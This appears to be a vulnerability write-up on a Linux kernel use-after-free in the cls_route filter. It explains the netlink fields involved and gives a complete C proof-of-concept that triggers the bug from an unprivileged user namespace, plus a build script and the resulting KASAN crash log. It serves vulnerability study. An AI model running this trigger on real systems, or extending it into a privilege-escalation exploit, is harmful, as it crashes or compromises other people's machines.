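Two of the values above are easier to read once decoded. The sketch below, which assumes the Linux UAPI header linux/pkt_sched.h is available, splits a handle into its major and minor halves and computes the version value from the table. demo_format_handle, demo_htb_version, and DEMO_HTB_VER are hypothetical names introduced for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <linux/pkt_sched.h>

#define DEMO_HTB_VER 0x30011    /* version word quoted in the table above */

/* Render a TC handle in major:minor form (both halves in hex). */
int demo_format_handle(uint32_t handle, char *out, size_t len)
{
    assert(out && len > 0);
    return snprintf(out, len, "%x:%x",
                    TC_H_MAJ(handle) >> 16, TC_H_MIN(handle));
}

/* Only the upper 16 bits of the version word go into the version member. */
uint32_t demo_htb_version(void)
{
    return DEMO_HTB_VER >> 16;
}
```

With these helpers the example handle 0x10000 reads as major 1, minor 0, and the version member evaluates to 3.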

A function that sets the values in the table above and sends the request to the kernel can be written as follows.

/* Relies on the headers and libnetlink helpers from the full listing above. */

enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
                          uint32_t handle, const char *kind)
{
    int err;
    struct rtnl_handle rth;
    struct tc_req qdreq;
    struct rtattr *tail;
    struct tc_htb_glob glob;

    LOG_FUNC();

    err = rtnl_open(&rth, 0);
    if (err)
        die("rtnl_open");

    /* Zero the request so that padding and unused fields are not
     * left holding stack garbage. */
    memset(&qdreq, 0, sizeof(qdreq));
    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
    qdreq.hdr.nlmsg_type = cmd;

    qdreq.tchdr.tcm_family = AF_UNSPEC;
    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
    qdreq.tchdr.tcm_handle = handle;
    qdreq.tchdr.tcm_parent = TC_H_ROOT;

    /* Set attributes */
    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
    tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
    memset(&glob, 0, sizeof(glob));
    glob.version = 0x00030011 >> 16;
    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
              &glob, sizeof(glob));
    addattr_nest_end(&qdreq.hdr, tail);

    err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
    if (err < 0)
        die("rtnl_talk");

    rtnl_close(&rth);
}

int main(int argc, char *argv[])
{
    int res;

    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
    if (res == -1)
        die("unshare");

    user_tc_modify_qdisc("lo",
                         RTM_NEWQDISC,
                         NLM_F_CREATE,
                         0x10000,
                         "htb");
    return 0;
}

Traffic Control Filter #

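This vulnerability can be triggered when a filter whose handle is 0 is freed. To get there, such a filter first has to be created. The elements that have to be set for this are as follows [3, 8].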

nlmsghdr member    Value
nlmsg_len          NLMSG_LENGTH(sizeof(<subsystem header structure variable>))
nlmsg_flags        NLM_F_REQUEST | NLM_F_CREATE
nlmsg_type         RTM_NEWTFILTER

tcmsg member       Value
tcm_family         AF_UNSPEC
tcm_ifindex        ifindex of the network interface
tcm_info           32-bit value: nonzero prio in the high 16 bits, proto in the low 16 bits (e.g., prio=0xbeef, proto=ETH_P_LOOP)
tcm_handle         0x0

Attribute          Value
TCA_KIND           "route"
TCA_OPTIONS        Not NULL
TCA_ROUTE4_TO      0x100000000 (64-bit)
TCA_ROUTE4_FROM    0x100000000 (64-bit)
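The tcm_info packing and the 64-bit attribute values in the table can be checked with a few lines of C. The sketch below assumes linux/pkt_sched.h and linux/if_ether.h are available; demo_pack_info and demo_read_u32 are hypothetical helpers. demo_read_u32 imitates a getter that reads only the first four bytes of an attribute payload, which is how a 32-bit read of an 8-byte payload behaves.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <linux/if_ether.h>
#include <linux/pkt_sched.h>

/* Pack prio (upper 16 bits) and proto (lower 16 bits) into tcm_info.
 * The cast keeps the shift in unsigned arithmetic. */
uint32_t demo_pack_info(uint16_t prio, uint16_t proto)
{
    return TC_H_MAKE((uint32_t)prio << 16, proto);
}

/* Read the first four bytes of a payload as a host-order 32-bit value,
 * ignoring any bytes that follow. */
uint32_t demo_read_u32(const void *payload, size_t len)
{
    uint32_t v;

    assert(payload && len >= sizeof(v));
    memcpy(&v, payload, sizeof(v));
    return v;
}
```

On a little-endian machine the first four bytes of the 64-bit value 0x100000000 are all zero, so a 32-bit read of that payload yields 0 for both the TO and the FROM attribute.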

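Here prio is set to a nonzero value so that route4_get sees the same head pointer across repeated requests. With prio 0 and NLM_F_CREATE the kernel picks a priority itself, so successive requests would not necessarily reach the same filter instance. A function that performs this work can be written as follows [3].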

/* Relies on the headers and libnetlink helpers from the full listing above. */

enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void user_tc_new_tfilter(const char *ifname, int cmd,
                         unsigned int flags, uint32_t handle, uint16_t prio,
                         uint16_t proto,
                         const char *kind, uint64_t from, uint64_t to)
{
    int err;
    struct rtnl_handle rthdle;
    struct tc_req req;
    struct rtattr *tail;

    LOG_FUNC();

    err = rtnl_open(&rthdle, 0);
    if (err < 0)
        die("rtnl_open");

    memset(&req, 0, sizeof(req));
    req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
    req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
    req.hdr.nlmsg_type = cmd;

    req.tchdr.tcm_family = AF_UNSPEC;
    req.tchdr.tcm_ifindex = if_nametoindex(ifname);
    /* Cast before shifting so that prio values with the top bit set
     * are not shifted into the sign bit of an int. */
    req.tchdr.tcm_info = TC_H_MAKE((uint32_t)prio << 16, proto);
    req.tchdr.tcm_handle = handle;

    addattr_l(&req.hdr, sizeof(req),
              TCA_KIND,
              kind, strlen(kind));
    tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
    addattr64(&req.hdr, sizeof(req),
              TCA_ROUTE4_TO,
              to);
    addattr64(&req.hdr, sizeof(req),
              TCA_ROUTE4_FROM,
              from);
    addattr_nest_end(&req.hdr, tail);

    err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
    if (err < 0)
        die("rtnl_talk");

    rtnl_close(&rthdle);
}

int main(int argc, char *argv[])
{
    int res;

    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
    if (res == -1)
        die("unshare");

    user_tc_new_tfilter("lo",
                        RTM_NEWTFILTER,
                        NLM_F_CREATE,
                        0x0,
                        0xbeef, ETH_P_LOOP,
                        "route",
                        0x100000000ULL, 0x100000000ULL);
    return 0;
}

Putting it all together #

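Now let's combine everything described so far with a filter replacement to trigger the UAF. To replace a filter, the new filter has to be created with TCA_ROUTE4_FROM and TCA_ROUTE4_TO attributes that differ from the existing values, because a request that matches an existing entry can fail with EEXIST. This can be seen in the route4_set_parms function (excerpt from net/sched/cls_route.c) [3].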

static int route4_set_parms(struct net *net, struct tcf_proto *tp,
                            unsigned long base, struct route4_filter *f,
                            u32 handle, struct route4_head *head,
                            struct nlattr **tb, struct nlattr *est, int new,
                            u32 flags, struct netlink_ext_ack *extack)
{
    u32 id = 0, to = 0, nhandle = 0x8000;
    struct route4_filter *fp;
    unsigned int h1;
    struct route4_bucket *b;
    int err;

    err = tcf_exts_validate(net, tp, tb, est, &f->exts, flags, extack);
    if (err < 0)
        return err;

    if (tb[TCA_ROUTE4_TO]) {
        if (new && handle & 0x8000)
            return -EINVAL;
        to = nla_get_u32(tb[TCA_ROUTE4_TO]);
        if (to > 0xFF)
            return -EINVAL;
        nhandle = to;
    }

    if (tb[TCA_ROUTE4_FROM]) {
        if (tb[TCA_ROUTE4_IIF])
            return -EINVAL;
        id = nla_get_u32(tb[TCA_ROUTE4_FROM]);
        if (id > 0xFF)
            return -EINVAL;
        nhandle |= id << 16;
    } else if (tb[TCA_ROUTE4_IIF]) {
        id = nla_get_u32(tb[TCA_ROUTE4_IIF]);
        if (id > 0x7FFF)
            return -EINVAL;
        nhandle |= (id | 0x8000) << 16;
    } else
        nhandle |= 0xFFFF << 16;

    if (handle && new) {
        nhandle |= handle & 0x7F00;
        if (nhandle != handle)
            return -EINVAL;
    }

    h1 = to_hash(nhandle);
    b = rtnl_dereference(head->table[h1]);
    if (!b) {
        b = kzalloc(sizeof(struct route4_bucket), GFP_KERNEL);
        if (b == NULL)
            return -ENOBUFS;

        rcu_assign_pointer(head->table[h1], b);
    } else {
        unsigned int h2 = from_hash(nhandle >> 16);

        for (fp = rtnl_dereference(b->ht[h2]);
             fp;
             fp = rtnl_dereference(fp->next))
            if (fp->handle == f->handle)
                return -EEXIST;
    }

    /* ... */

    return 0;
}
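The way nhandle is derived from the TO and FROM attributes can be followed in isolation. The function below is a sketch that copies only the TO and FROM branches of the excerpt above; the IIF branch and the checks against the caller-supplied handle are left out, and demo_route_handle is a hypothetical name.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Follow the TO/FROM branches of the excerpt above.
 * Returns false where the excerpt would return -EINVAL. */
bool demo_route_handle(bool has_to, uint32_t to,
                       bool has_from, uint32_t from, uint32_t *out)
{
    uint32_t nhandle = 0x8000;

    assert(out);
    if (has_to) {
        if (to > 0xFF)
            return false;
        nhandle = to;               /* replaces the 0x8000 default */
    }
    if (has_from) {
        if (from > 0xFF)
            return false;
        nhandle |= from << 16;
    } else {
        nhandle |= 0xFFFFu << 16;   /* wildcard source */
    }
    *out = nhandle;
    return true;
}
```

With both attributes present and equal to 0 the result is 0, while TO=1 and FROM=1 give 0x00010001, so the second request hashes to a different slot than the first.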

The code that triggers the UAF can then be written as follows [8].

  1#define _GNU_SOURCE
  2
  3#include <stdio.h>
  4#include <string.h>
  5#include <stdlib.h>
  6#include <stdint.h>
  7#include <stdbool.h>
  8#include <signal.h>
  9#include <time.h>
 10#include <sys/mman.h>
 11#include <sys/types.h>
 12#include <sys/utsname.h>
 13#include <sys/wait.h>
 14#include <sys/socket.h>
 15#include <sys/ioctl.h>
 16#include <sys/uio.h>
 17#include <unistd.h>
 18#include <sched.h>
 19#include <fcntl.h>
 20#include <syslog.h>
 21#include <errno.h>
 22#include <netinet/in.h>
 23#include <arpa/inet.h>
 24#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_link.h>
#include <linux/neighbour.h>
#include <linux/netconf.h>
#include <linux/if_ether.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <libnl3/netlink/route/tc.h>
#include <libnl3/netlink/route/qdisc.h>
#include <libnl3/netlink/route/qdisc/tbf.h>

/* ----------------------< libnetlink >--------------------------------- */

struct rtnl_handle {
    int                 fd;
    struct sockaddr_nl  local;
    struct sockaddr_nl  peer;
    __u32               seq;
    __u32               dump;
    int                 proto;
    FILE               *dump_fp;
#define RTNL_HANDLE_F_LISTEN_ALL_NSID     0x01
    int                 flags;
};

/* Points just past the current end of the message, where the next attribute goes. */
#define NLMSG_TAIL(nmsg) \
    ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))


static inline const char *rta_getattr_str(const struct rtattr *rta)
{
    return (const char *)RTA_DATA(rta);
}

/* Append one attribute (type, payload of alen bytes) to the message. */
static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
                     int alen)
{
    int len = RTA_LENGTH(alen);
    struct rtattr *rta;

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
        fprintf(stderr,
                "addattr_l ERROR: message exceeded bound of %d\n",
                maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}

static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
{
    return addattr_l(n, maxlen, type, &data, sizeof(__u32));
}

static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
{
    return addattr_l(n, maxlen, type, &data, sizeof(__u64));
}

/* Open a nested attribute; its length is fixed up by addattr_nest_end(). */
static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
{
    struct rtattr *nest = NLMSG_TAIL(n);

    addattr_l(n, maxlen, type, NULL, 0);
    return nest;
}

static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
{
    nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
    return n->nlmsg_len;
}

#ifndef SOL_NETLINK
#define SOL_NETLINK 270
#endif

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

static int rcvbuf = 1024 * 1024;

static void rtnl_close(struct rtnl_handle *rth)
{
    if (rth->fd >= 0) {
        close(rth->fd);
        rth->fd = -1;
    }
}

static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
                             int protocol)
{
    socklen_t addr_len;
    int sndbuf = 32768;

    memset(rth, 0, sizeof(*rth));

    rth->proto = protocol;
    rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
    if (rth->fd < 0) {
        perror("Cannot open netlink socket");
        return -1;
    }

    if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
                   &sndbuf, sizeof(sndbuf)) < 0) {
        perror("SO_SNDBUF");
        return -1;
    }

    if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
                   &rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("SO_RCVBUF");
        return -1;
    }

    memset(&rth->local, 0, sizeof(rth->local));
    rth->local.nl_family = AF_NETLINK;
    rth->local.nl_groups = subscriptions;

    if (bind(rth->fd, (struct sockaddr *)&rth->local,
             sizeof(rth->local)) < 0) {
        perror("Cannot bind netlink socket");
        return -1;
    }
    addr_len = sizeof(rth->local);
    if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
                    &addr_len) < 0) {
        perror("Cannot getsockname");
        return -1;
    }
    if (addr_len != sizeof(rth->local)) {
        fprintf(stderr, "Wrong address length %d\n", addr_len);
        return -1;
    }
    if (rth->local.nl_family != AF_NETLINK) {
        fprintf(stderr, "Wrong address family %d\n",
                rth->local.nl_family);
        return -1;
    }
    rth->seq = time(NULL);
    return 0;
}

static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
{
    return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
}

/* Send one request and wait for its ACK (answer == NULL) or first reply. */
static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
                       struct nlmsghdr *answer, size_t maxlen,
                       bool show_rtnl_err)
{
    int status;
    unsigned int seq;
    struct nlmsghdr *h;
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct iovec iov = {
        .iov_base = n,
        .iov_len = n->nlmsg_len
    };
    struct msghdr msg = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    char   buf[32768] = {};

    n->nlmsg_seq = seq = ++rtnl->seq;

    if (answer == NULL)
        n->nlmsg_flags |= NLM_F_ACK;

    status = sendmsg(rtnl->fd, &msg, 0);
    if (status < 0) {
        perror("Cannot talk to rtnetlink");
        return -1;
    }

    iov.iov_base = buf;
    while (1) {
        iov.iov_len = sizeof(buf);
        status = recvmsg(rtnl->fd, &msg, 0);

        if (status < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            fprintf(stderr, "netlink receive error %s (%d)\n",
                    strerror(errno), errno);
            return -1;
        }
        if (status == 0) {
            fprintf(stderr, "EOF on netlink\n");
            return -1;
        }
        if (msg.msg_namelen != sizeof(nladdr)) {
            fprintf(stderr,
                    "sender address length == %d\n",
                    msg.msg_namelen);
            exit(1);
        }
        for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
            int len = h->nlmsg_len;
            int l = len - sizeof(*h);

            if (l < 0 || len > status) {
                if (msg.msg_flags & MSG_TRUNC) {
                    fprintf(stderr, "Truncated message\n");
                    return -1;
                }
                fprintf(stderr,
                        "!!!malformed message: len=%d\n",
                        len);
                exit(1);
            }

            if (nladdr.nl_pid != 0 ||
                h->nlmsg_pid != rtnl->local.nl_pid ||
                h->nlmsg_seq != seq) {
                /* Don't forget to skip that message. */
                status -= NLMSG_ALIGN(len);
                h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
                continue;
            }

            if (h->nlmsg_type == NLMSG_ERROR) {
                struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);

                if (l < sizeof(struct nlmsgerr)) {
                    fprintf(stderr, "ERROR truncated\n");
                } else if (!err->error) {
                    /* error == 0 is the ACK for our request. */
                    if (answer)
                        memcpy(answer, h,
                               MIN(maxlen, h->nlmsg_len));
                    return 0;
                }

                if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
                    fprintf(stderr,
                            "RTNETLINK answers: %s\n",
                            strerror(-err->error));
                errno = -err->error;
                return -1;
            }

            if (answer) {
                memcpy(answer, h,
                       MIN(maxlen, h->nlmsg_len));
                return 0;
            }

            fprintf(stderr, "Unexpected reply!!!\n");

            status -= NLMSG_ALIGN(len);
            h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
        }

        if (msg.msg_flags & MSG_TRUNC) {
            fprintf(stderr, "Message truncated\n");
            continue;
        }

        if (status) {
            fprintf(stderr, "!!!Remnant of size %d\n", status);
            exit(1);
        }
    }
}

static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
                     struct nlmsghdr *answer, size_t maxlen)
{
    return __rtnl_talk(rtnl, n, answer, maxlen, true);
}

/* Index the attributes of a message by type into tb[0..max]. */
static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
                              int len, unsigned short flags)
{
    unsigned short type;

    memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
    while (RTA_OK(rta, len)) {
        type = rta->rta_type & ~flags;
        if ((type <= max) && (!tb[type]))
            tb[type] = rta;
        rta = RTA_NEXT(rta, len);
    }
    if (len)
        fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
                len, rta->rta_len);
    return 0;
}

/* --------------------------------------------------------------------- */

enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void print_qdisc_info(const char *ifname)
{
    int err;
    /* Full-size reply buffer: rtnl_talk() copies up to maxlen bytes of the
     * answer, which does not fit in a bare struct nlmsghdr. */
    struct tc_req res;
    struct tcmsg *t;
    struct rtattr *tb[TCA_MAX + 1];
    struct rtnl_handle rth;
    struct tc_req qdreq;

    LOG_FUNC();

    err = rtnl_open(&rth, 0);
    if (err)
        die("rtnl_open");

    bzero(&res, sizeof(res));
    bzero(&qdreq, sizeof(qdreq));
    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    qdreq.hdr.nlmsg_type = RTM_GETQDISC;

    qdreq.tchdr.tcm_family = AF_UNSPEC;
    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);

    LOG("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);

    err = rtnl_talk(&rth, &qdreq.hdr, &res.hdr, sizeof(res));
    if (err < 0)
        die("rtnl_talk");

    t = NLMSG_DATA(&res.hdr);
    if (res.hdr.nlmsg_type != RTM_NEWQDISC && res.hdr.nlmsg_type != RTM_DELQDISC)
        die("Not a qdisc");

    parse_rtattr_flags(tb,
                       TCA_MAX,
                       TCA_RTA(t),
                       res.hdr.nlmsg_len - NLMSG_LENGTH(sizeof(*t)),
                       NLA_F_NESTED);
    /* TCA_KIND may be absent from the reply, so guard the dereference. */
    printf("qdisc %s %x:[%08x]\n",
           tb[TCA_KIND] ? rta_getattr_str(tb[TCA_KIND]) : "(unknown)",
           t->tcm_handle >> 16, t->tcm_handle);

    rtnl_close(&rth);
}

void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
                          uint32_t handle, const char *kind)
{
    int err;
    struct rtnl_handle rth;
    struct tc_req qdreq;
    struct rtattr *tail;
    struct tc_htb_glob glob;

    LOG_FUNC();

    err = rtnl_open(&rth, 0);
    if (err)
        die("rtnl_open");

    /* Zero the request so that unset header fields are not stack garbage. */
    bzero(&qdreq, sizeof(qdreq));
    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
    qdreq.hdr.nlmsg_type = cmd;

    qdreq.tchdr.tcm_family = AF_UNSPEC;
    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
    qdreq.tchdr.tcm_handle = handle;
    qdreq.tchdr.tcm_parent = TC_H_ROOT;

    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
    tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
    bzero(&glob, sizeof(glob));
    glob.version = 0x00030011 >> 16;    /* HTB major version 3 */
    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
              &glob, sizeof(glob));
    addattr_nest_end(&qdreq.hdr, tail);

    err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
    if (err < 0)
        die("rtnl_talk");

    rtnl_close(&rth);
}

void user_tc_new_tfilter(const char *ifname, int cmd,
                         unsigned int flags, uint32_t handle, uint16_t prio,
                         uint16_t proto,
                         const char *kind, uint64_t from, uint64_t to)
{
    int err;
    struct rtnl_handle rthdle;
    struct tc_req req;
    struct rtattr *tail;

    LOG_FUNC();

    err = rtnl_open(&rthdle, 0);
    if (err < 0)
        die("rtnl_open");

    bzero(&req, sizeof(req));
    req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
    req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
    req.hdr.nlmsg_type = cmd;

    req.tchdr.tcm_family = AF_UNSPEC;
    req.tchdr.tcm_ifindex = if_nametoindex(ifname);
    req.tchdr.tcm_info = TC_H_MAKE(prio << 16, proto);
    req.tchdr.tcm_handle = handle;

    addattr_l(&req.hdr, sizeof(req),
              TCA_KIND,
              kind, strlen(kind));
    tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
    /* Both values are sent as 64-bit payloads; cls_route reads them as
     * 32-bit values, so only the low 32 bits matter on a little-endian host. */
    addattr64(&req.hdr, sizeof(req),
              TCA_ROUTE4_TO,
              to);
    addattr64(&req.hdr, sizeof(req),
              TCA_ROUTE4_FROM,
              from);
    addattr_nest_end(&req.hdr, tail);

    err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
    if (err < 0)
        die("rtnl_talk");

    rtnl_close(&rthdle);
}

int main(int argc, char *argv[])
{
    int res;

    /* Work inside fresh user and network namespaces. */
    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
    if (res == -1)
        die("unshare");

    user_tc_modify_qdisc("lo",
                         RTM_NEWQDISC,
                         NLM_F_CREATE,
                         0x10000,
                         "htb");
    print_qdisc_info("lo");

    /* First request: create a route filter (low 32 bits of to/from are 0). */
    user_tc_new_tfilter("lo",
                        RTM_NEWTFILTER,
                        NLM_F_CREATE,
                        0x0,
                        0xbeef, ETH_P_LOOP,
                        "route",
                        0x100000000, 0x100000000);
    /* Second request: same tcm_handle (0) and priority, new to/from values,
     * so the existing filter is replaced through route4_change. */
    user_tc_new_tfilter("lo",
                        RTM_NEWTFILTER,
                        NLM_F_CREATE,
                        0x0,
                        0xbeef, ETH_P_LOOP,
                        "route",
                        0x1, 0x1);
    return 0;
}

The code above can be compiled with the following script.

#!/bin/bash

# $1 is the C source file; the executable is named after it without the .c suffix.
src="$1"
exe="${src%.c}"

gcc -I/usr/include/libnl3/ "$src" -o "$exe" -lnl-3 -lmnl -lnl-route-3

Running the resulting binary produces the following kernel log.

[ 3136.361496] ==================================================================
[ 3136.364037] BUG: KASAN: use-after-free in route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.365314] Read of size 8 at addr ffff88800ba2d000 by task kworker/u4:0/1427
[ 3136.366115] 
[ 3136.366350] CPU: 1 PID: 1427 Comm: kworker/u4:0 Not tainted 5.18.0 #1
[ 3136.367041] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 3136.368194] Workqueue: netns cleanup_net
[ 3136.368693] Call Trace:
[ 3136.369014]  <TASK>
[ 3136.369306]  dump_stack_lvl+0x49/0x60
[ 3136.369757]  print_report.cold+0x5e/0x5d0
[ 3136.370253]  ? route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.370831]  kasan_report+0xaa/0x120
[ 3136.371282]  ? route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.371856]  __asan_load8+0x87/0xb0
[ 3136.372285]  route4_destroy+0x190/0x4d0 [cls_route]
[ 3136.372842]  ? route4_init+0x60/0x60 [cls_route]
[ 3136.373404]  ? __kasan_check_write+0x14/0x20
[ 3136.373909]  ? mutex_unlock+0x81/0xd0
[ 3136.374367]  tcf_proto_destroy+0x54/0x150
[ 3136.374863]  tcf_proto_put+0x5b/0x80
[ 3136.375300]  tcf_chain_flush+0xdf/0x150
[ 3136.375759]  __tcf_block_put+0xea/0x1c0
[ 3136.376458]  tcf_block_put+0xca/0x110
[ 3136.376928]  ? tcf_block_put_ext+0x60/0x60
[ 3136.377424]  htb_destroy+0xed/0x760 [sch_htb]
[ 3136.377943]  ? rcu_exp_wait_wake+0x570/0x570
[ 3136.378455]  ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
[ 3136.379140]  ? htb_reset+0x1dd/0x2a0 [sch_htb]
[ 3136.379699]  ? qdisc_reset+0x1dd/0x280
[ 3136.380268]  qdisc_destroy+0x63/0x150
[ 3136.380764]  qdisc_put+0x6b/0x80
[ 3136.381373]  dev_shutdown+0x129/0x180
[ 3136.382049]  unregister_netdevice_many+0x4dd/0xc50
[ 3136.382872]  ? __kasan_check_read+0x11/0x20
[ 3136.383549]  ? dev_cpu_dead+0x400/0x400
[ 3136.384121]  ? unregister_netdevice_many+0xc50/0xc50
[ 3136.384876]  default_device_exit_batch+0x2df/0x370
[ 3136.385603]  ? __dev_change_net_namespace+0xaf0/0xaf0
[ 3136.386357]  ops_exit_list+0x92/0xa0
[ 3136.386927]  cleanup_net+0x2f3/0x5e0
[ 3136.387493]  ? unregister_pernet_device+0x60/0x60
[ 3136.388204]  ? rtnl_unlock+0xe/0x20
[ 3136.388757]  process_one_work+0x44f/0x740
[ 3136.389400]  worker_thread+0x2bb/0x6f0
[ 3136.389986]  ? process_one_work+0x740/0x740
[ 3136.390629]  kthread+0x179/0x1b0
[ 3136.392849]  ? kthread_complete_and_exit+0x30/0x30
[ 3136.395048]  ret_from_fork+0x22/0x30
[ 3136.397079]  </TASK>
[ 3136.398830] 
[ 3136.400410] Allocated by task 1445:
[ 3136.402366] 
[ 3136.403954] Freed by task 1427:
[ 3136.405785] 
[ 3136.407233] Last potentially related work creation:
[ 3136.409123] 
[ 3136.410537] Second to last potentially related work creation:
[ 3136.412539] 
[ 3136.414005] The buggy address belongs to the object at ffff88800ba2d000
[ 3136.414005]  which belongs to the cache kmalloc-192 of size 192
[ 3136.418199] The buggy address is located 0 bytes inside of
[ 3136.418199]  192-byte region [ffff88800ba2d000, ffff88800ba2d0c0)
[ 3136.422262] 
[ 3136.423764] The buggy address belongs to the physical page:
[ 3136.425828] 
[ 3136.427344] Memory state around the buggy address:
[ 3136.429290]  ffff88800ba2cf00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3136.431594]  ffff88800ba2cf80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3136.433601] >ffff88800ba2d000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 3136.435610]                    ^
[ 3136.437281]  ffff88800ba2d080: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 3136.439355]  ffff88800ba2d100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 3136.441418] ==================================================================
[ 3136.444173] general protection fault, probably for non-canonical address 0x92a000ea00000593: 0000 [#1] PREEMPT SMP KASAN PTI
[ 3136.447177] CPU: 1 PID: 1427 Comm: kworker/u4:0 Tainted: G    B   W         5.18.0 #1
[ 3136.449696] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 3136.452337] Workqueue: netns cleanup_net
[ 3136.454369] RIP: 0010:tcf_action_destroy+0x85/0xd0
